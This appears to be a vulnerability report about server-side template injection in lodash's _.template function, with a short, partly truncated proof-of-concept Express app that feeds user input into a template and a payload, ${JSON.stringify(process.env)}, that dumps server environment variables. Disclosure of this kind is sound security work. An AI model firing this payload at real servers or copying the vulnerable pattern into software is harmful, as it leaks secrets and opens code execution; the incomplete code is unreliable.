Lucene search

HistoryJun 22, 2020 - 6:16 a.m.

Node.js third-party modules: Server-side Template Injection in lodash.js


I would like to report Server-side Template Injection in lodash.js (_.template function)
It allows the execution of code on the server


module name: lodashversion:4.17.15npm page:

Module Description

The Lodash library exported as Node.js modules.

Module Stats

26,664,631 weekly downloads


Vulnerability Description

The _.template function of the lodash package does not properly validate user-supplied input.

An application making use of the lodash package may be exploited by an attacker that controls the value of a parameter processed by the _.template function. An attacker can inject code such as Javascript within parenthesis for example parameter=${JSON.stringify(process.env)} which will be executed by the server.

Steps To Reproduce:

Step 1: Create a test application that requires the lodash.js library. The application below accepts user-supplied input in the β€˜name’ parameter that is handled by lodash _.template function

const express = require('express');
const _ = require('lodash');
const escapeHTML = require('escape-html');
const app = express();
app.get('/', (req, res) => {
  res.set('Content-Type', 'text/html');
  const name =
  // Create a template from user input
  const compiled = _.template("Hello " + escapeHTML(name) + ".");

app.listen(8000, () => {
  console.log('POC app listening on port 8000!')

Step 2: Visit the vulnerable application at

Step 3: Visit the vulnerable application and enter a payload such as ${JSON.stringify(process.env)} into the name parameter e.g.${JSON.stringify(process.env)}

Supporting Material/References:

  • OSX 10.15.5
  • NODEJS v10.16.0
  • NPM v 6.9.0

Wrap up

  • I contacted the maintainer to let them know: [Y/N] N
  • I opened an issue in the related repository: [Y/N] N

> Hunter’s comments and funny memes goes here

Apologies if I haven’t used the ideal terminology or if this is a duplicate.


Remote code execution